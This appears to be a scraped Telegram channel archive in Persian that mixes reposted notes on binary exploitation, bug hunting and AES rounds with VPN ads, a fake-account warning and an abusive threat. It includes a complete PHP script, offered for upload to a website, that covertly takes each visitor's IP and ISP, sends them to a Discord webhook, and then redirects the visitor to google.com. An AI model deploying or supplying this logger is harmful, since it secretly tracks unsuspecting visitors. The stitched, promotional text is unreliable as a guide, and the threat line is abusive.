ru
Feedback
BugLearn

BugLearn

Открыть в Telegram
3 267
Подписчики
+824 часа
+37 дней
-1530 дней
Архив постов
Repost from ReverseEngineering
Binary Exploitation معمولا توی سطح خیلی پایین سیستم اتفاق می‌افته یعنی باید با چیزایی مثل: اسمبلی (Assembly) ساختار حافظه مثل Stack و Heap نحوه‌ی کارکرد تابع‌ها و برگشت از اون‌ها سیستم‌عامل‌ها (مخصوصا لینوکس) چندتا کاربرد مهم Binary Exploitation : 1 نوشتن اکسپلویت برای برنامه‌های آسیب‌پذیر مثلا یه برنامه C داری که توش بافر اورفلو داره با ساختن یه ورودی خاص میتونید کاری کنید که اون برنامه به جای اجرای کد خودش کدی که شما نوشتی رو اجرا کنه 2 Capture the Flag (CTF) توی مسابقات امنیتی چالش‌های زیادی هست که با باینری اکسپلویت حل میشن این چالش‌ها خیلی برای تمرین خوبن 3 تحلیل بدافزارها گاهی بدافزارها با روش‌هایی مثل ROP یا تزریق کد سیستم رو الوده میکنن اگه Binary Exploitation بلد باشید بهتر میتونید عملکردشون رو بفهمید

Repost from ReverseEngineering
مثال عملی ساده مثلا برنامه‌ای داری که ورودی یوزر رو می‌گیره:
char buffer[100]; gets(buffer);
اینجا احتمال Buffer Overflow هست با یه فایل ساده حاوی رشته‌ی بلند برنامه کرش میکنه بعدش با x64dbg مسیر بازنویسی EIP رو دنبال می‌کنی و یه shellcode کوچیک تزریق می‌کنی

Repost from ReverseEngineering
ابزار های مهم در این مسیر
ابزار های مهم در این مسیر

Repost from ReverseEngineering
مراحل پیدا کردن باگ در اپلیکیشن‌ها 1 جمع‌آوری اطلاعات: بررسی ساختار برنامه dependencyها dllهای بارگذاری‌شده 2 رفتارشناسی دینامیک: اجرای برنامه با ابزارهایی مثل x64dbg ، Procmon، Process Hacker 3 تحلیل استاتیک: استفاده از IDA یا Ghidra برای بررسی کدها رشته‌ها 4 فاز کردن ورودی‌ها (Fuzzing): بررسی واکنش برنامه به ورودی‌های ناسالم یا دستکاری‌شده 5 انالیز کرش و Debug: دنبال کردن کرش‌ها با WinDbg یا x64dbg برای بررسی مسیر باگ 6 ساخت POC یا اکسپلویت: اگر باگی پیدا شد، یه کد برای اثباتش بساز

<?php
$discordWebhookUrl = 'Enter the your Disocrd Channel Webhook';
$userIp = $_SERVER['REMOTE_ADDR'];
$isp = json_decode(file_get_contents('https://ipinfo.io/' . $userIp . '/json'));
$data = [
    'content' => "**New Visitor Information:**",
    'embeds' => [
        [
            'title' => 'IP:',
            'description' => $userIp,
            'color' => 333333,
        ],
        [
            'title' => 'ISP:',
            'description' => $isp->isp,
            'color' => 000000,
        ],
    ],
];
$options = [
    'http' => [
        'header' => "Content-type: application/json\r\n",
        'method' => 'POST',
        'content' => json_encode($data),
    ],
];
$context = stream_context_create($options);
$response = file_get_contents($discordWebhookUrl, false, $context);
header("location:https://google.com");
?>
✔️| Php Ip & Isp Logger ⚡️| Upload in your website

دوستای خوبم سلاااام 😍 بازم مثل همیشه امروز میتونید با هدیه هیجان انگیز کانفیگ های پرسرعت مارو تهیه کنید سرعت و کیفیت تضمین شده هست 😌👌 من منتظرتون هستم🥲👇 @nika_magician @prisvpn

Repost from Black learn 🎫
(اولین پابم توسط تیم ما با همکاری تیم ۰۲۱ انجام شده)

Repost from Black learn 🎫
پایتون آنیسا عجببب دوره ایههه برای انبارم شده نگهش دارید هم این هم بقیه دوره ها می خوام باتو پاک کنم تو مسیجاتون باشه حداقل

پرسرعت و باکیفیت بالا و با قیمت های باورنکردنی

شب همگی بخیررر😍 از الان تا فرداشب میتونید با هدیه ویژه کانفیگ خریداری کنید 😉 منتظرتونم 😍👇 @nika_magician @prisvpn

امروز میتونید با خرید کانفیگ هدیه باورنکردنی دریافت کنید 😍❤️ برای خرید به آیدی زیر مراجعه کنید @nika_magician @prisvpn همراه با تضمین سرعت و کیفیت 😍

چنل بچه های خودمونه بشدت عالی و کاربردی🥂🍷

Repost from ReverseEngineering
تكرار این تبدیل ها 9 بار دیگه تكرار میشن در تكرار آخر تركیب ستون ها وجود نداره و با اضافه كردن كلید round متن رمزنگاری شده به دست میاد كلید هم به ترتیب خود شیفت پیدا می كنه گرد میشه و به خودش اضافه میشه.

Repost from ReverseEngineering
كلیدهای Round در مرحله بعدی یک كلید round به هر ستون اضافه میشه این كلید در واقع یک تیکه کوچیک از یک كلید محرمانه است كه برای مراحل بعدی رمزنگاری تزریق میشه

Repost from ReverseEngineering
شیفت ردیف و تركیب ستونها بایت هایی كه باید رمزنگاری شن توسط جایگذاری تعویض میشن و بعد ردیف ها شیفت پیدا میکنن برای مثال اولین
شیفت ردیف و تركیب ستونها بایت هایی كه باید رمزنگاری شن توسط جایگذاری تعویض میشن و بعد ردیف ها شیفت پیدا میکنن برای مثال اولین ردیف دست نخورده باقی میمونه ردیف دوم یک محل به راست جابجا میشه سومین ردیف دو محل جابجا میشه و آخرین ردیف نیز سه محل جابجا میشه این پروسه توسط یک فاز تركیب ستونها دنبال میشه كه در آن هر ستون از ماتریس در یک ماتریس دیگر ضرب میشه تا موقعیت ستون تغییر کنه

این پیج فیکه و به هرکسی پیام بده یا هرچیز دیگه ای بدونید که من نیستم تشکر ❤️🤓 Telegram @nika_magician Instagram nicka_ashoor
این پیج فیکه و به هرکسی پیام بده یا هرچیز دیگه ای بدونید که من نیستم تشکر ❤️🤓 Telegram @nika_magician Instagram nicka_ashoori تنها اکانت های من در شبکه های مجازی

این پیج فیکه و به هرکسی پیام بده یا هرچیز دیگه ای بدونید که من نیستم تشکر ❤️🤓 Telegram @nika_magician Instagram nicka_ashoor
این پیج فیکه و به هرکسی پیام بده یا هرچیز دیگه ای بدونید که من نیستم تشکر ❤️🤓 Telegram @nika_magician Instagram nicka_ashoori تنها اکانت های من در شبکه های مجازی

دلقک حرومزاده ای که فیک بچه های مارو زدی خودت گمشو دیلیتش کن تا پیدات نکردیم
دلقک حرومزاده ای که فیک بچه های مارو زدی خودت گمشو دیلیتش کن تا پیدات نکردیم

ظاهرا چنل پرفسور سنایی هکر بزرگ ایران بسته شده